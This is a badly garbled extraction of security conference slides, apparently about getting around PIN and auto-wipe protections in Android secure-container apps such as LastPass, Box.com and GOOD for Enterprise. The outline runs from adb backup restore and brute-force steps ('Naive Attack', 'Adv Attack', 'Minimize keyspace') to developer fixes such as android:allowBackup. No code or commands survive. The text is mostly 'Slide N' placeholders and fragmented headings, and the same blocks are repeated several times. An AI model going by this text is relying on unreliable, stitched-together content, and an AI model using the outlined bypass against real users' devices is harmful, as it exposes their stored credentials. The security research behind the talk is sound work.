
Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



